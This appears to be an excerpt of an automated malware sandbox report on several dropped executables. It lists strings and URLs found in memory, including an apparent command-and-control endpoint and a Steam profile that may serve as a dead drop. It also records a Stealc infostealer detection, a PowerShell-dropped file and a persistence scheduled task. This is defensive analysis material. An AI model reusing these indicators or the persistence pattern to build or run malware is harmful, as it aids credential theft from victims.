                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/W
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
                                    Source: 696689ce6d.exe, 0000002F.00000003.4862231655.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4825063904.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4847052772.00000000009FB000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4886389394.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4822742633.00000000009F1000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4849099979.00000000009FE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4858982732.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4839076597.00000000009F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900i(
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/w
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792947545.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793714186.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4792797720.0000000000A0D000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4809448660.00000000009E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2590627556.0000000003BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2590627556.0000000003BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.2143978128.000000000BD68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.Qb0WswhkLhoa
                                    Source: 696689ce6d.exe, 0000002F.00000003.4792947545.000000000098B000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627184519.000000000098A000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4793361431.00000000009A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sustainskelet.lat/api
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612814549.00000000007FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_f6f292994d7c60be109e4c185cbc03032d36d17160d4e639
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1578377748.0000000005FAE000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578537783.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1578446247.0000000005FAB000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.1941499890.0000000000EAE000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317638364.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317245338.0000000003A9B000.00000004.00000800.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2317060231.0000000003A9E000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794904156.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4795781202.00000000034BC000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4794653136.00000000034BE000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2482031701.0000000003B1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1616651541.0000000005F65000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616808855.0000000005F6F000.00000004.00000800.00020000.00000000.sdmp, EdYEXasNiR.exe, 00000000.00000003.1616331109.0000000005F61000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2221527701.000000000BB1E000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2367759874.0000000001547000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612191991.00000000007FC000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2612630439.00000000007FD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FC4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2590627556.0000000003BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.8Z86fTxZfkM6
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FC4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2590627556.0000000003BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.UnUp0v0CLe9Y
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FC4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1601814965.000000000608A000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.2143978128.000000000BD68000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2366416967.0000000003B6F000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4826638972.000000000359D000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2590627556.0000000003BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                    Source: jyidkjkfhjawd.exe, 00000041.00000003.2590627556.0000000003BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FC4000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                    Source: EdYEXasNiR.exe, 00000000.00000003.1601814965.000000000608A000.00000004.00000800.00020000.00000000.sdmp, DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000003.2143978128.000000000BD68000.00000004.00000020.00020000.00000000.sdmp, 64252d274d.exe, 00000024.00000003.2366416967.0000000003B6F000.00000004.00000800.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4826638972.000000000359D000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000041.00000003.2590627556.0000000003BF5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe, 00000003.00000002.2212351037.0000000000FA5000.00000040.00000001.01000000.00000006.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe
                                    Source: skotes.exe, 00000012.00000003.6196619100.000000000148A000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000012.00000003.6196730259.000000000140E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.overwolf.com0
                                    Source: 696689ce6d.exe, 0000002F.00000003.4779363969.0000000000A05000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
                                    Source: 696689ce6d.exe, 0000002F.00000003.4627184519.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 696689ce6d.exe, 0000002F.00000003.4627021291.00000000009F6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/

                                    System Summary

                                    barindex
                                    Malicious sample detected (through community Yara rule)
                                    Source: 3.2.DX0TGIT2LZWIIEDZ8Y3A15R.exe.ef0000.0.unpack, type: UNPACKEDPEMatched rule: Finds Stealc standalone samples (or dumps) based on the strings Author: Sekoia.io
                                    PE file contains section with special chars
                                    Source: EdYEXasNiR.exeStatic PE information: section name:
                                    Source: EdYEXasNiR.exeStatic PE information: section name: .idata
                                    Source: EdYEXasNiR.exeStatic PE information: section name:
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name:
                                    Source: DX0TGIT2LZWIIEDZ8Y3A15R.exe.0.drStatic PE information: section name: .idata
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name:
                                    Source: 456YTTQ213T2RO9QAEYSNNZDL.exe.0.drStatic PE information: section name: .idata
                                    Source: random[1].exe.3.drStatic PE information: section name:
                                    Source: random[1].exe.3.drStatic PE information: section name: .idata
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name:
                                    Source: HJEHIJEBKE.exe.3.drStatic PE information: section name: .idata
                                    Source: skotes.exe.5.drStatic PE information: section name:
                                    Source: skotes.exe.5.drStatic PE information: section name: .idata
                                    Source: random[3].exe.18.drStatic PE information: section name:
                                    Source: random[3].exe.18.drStatic PE information: section name: .idata
                                    Source: random[3].exe.18.drStatic PE information: section name:
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name:
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name: .idata
                                    Source: 95ba65f98f.exe.18.drStatic PE information: section name:
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name:
                                    Source: f2a96255ac.exe.18.drStatic PE information: section name: .idata
                                    Source: random[3].exe0.18.drStatic PE information: section name:
                                    Source: random[3].exe0.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe.18.drStatic PE information: section name:
                                    Source: random[4].exe.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe.18.drStatic PE information: section name:
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name:
                                    Source: ccb71f0bac.exe.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe0.18.drStatic PE information: section name:
                                    Source: random[4].exe0.18.drStatic PE information: section name: .idata
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name:
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name: .idata
                                    Source: 0bf9323d7e.exe.18.drStatic PE information: section name:
                                    Source: random[4].exe1.18.drStatic PE information: section name:
                                    Source: random[4].exe1.18.drStatic PE information: section name: .idata
                                    Source: random[4].exe1.18.drStatic PE information: section name:
                                    Source: e18644e148.exe.18.drStatic PE information: section name:
                                    Source: e18644e148.exe.18.drStatic PE information: section name: .idata
                                    Source: e18644e148.exe.18.drStatic PE information: section name:
                                    Source: random[3].exe2.18.drStatic PE information: section name:
                                    Source: random[3].exe2.18.drStatic PE information: section name: .idata
                                    Source: random[3].exe2.18.drStatic PE information: section name:
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name:
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name: .idata
                                    Source: 8663788bd2.exe.18.drStatic PE information: section name:
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name:
                                    Source: 483d2fa8a0d53818306efeb32d3.exe.53.drStatic PE information: section name: .idata
                                    PE file has nameless sections
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Source: jyidkjkfhjawd.exe.29.drStatic PE information: section name:
                                    Powershell drops PE file
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeJump to dropped file
                                    Source: C:\Users\user\AppData\Local\Temp\1027564001\696689ce6d.exeProcess Stats: CPU usage > 49%
                                    Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess Stats: CPU usage > 49%
                                    Source: C:\Users\user\AppData\Local\Temp\456YTTQ213T2RO9QAEYSNNZDL.exeFile created: C:\Windows\Tasks\skotes.jobJump to behavior
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C40AC603_2_6C40AC60
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4C6C003_2_6C4C6C00
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4DAC303_2_6C4DAC30
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C45ECD03_2_6C45ECD0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C3FECC03_2_6C3FECC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C52AD503_2_6C52AD50
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C4CED703_2_6C4CED70
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C588D203_2_6C588D20
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C58CDC03_2_6C58CDC0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C496D903_2_6C496D90
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C404DB03_2_6C404DB0
                                    Source: C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exeCode function: 3_2_6C49EE703_2_6C49EE70
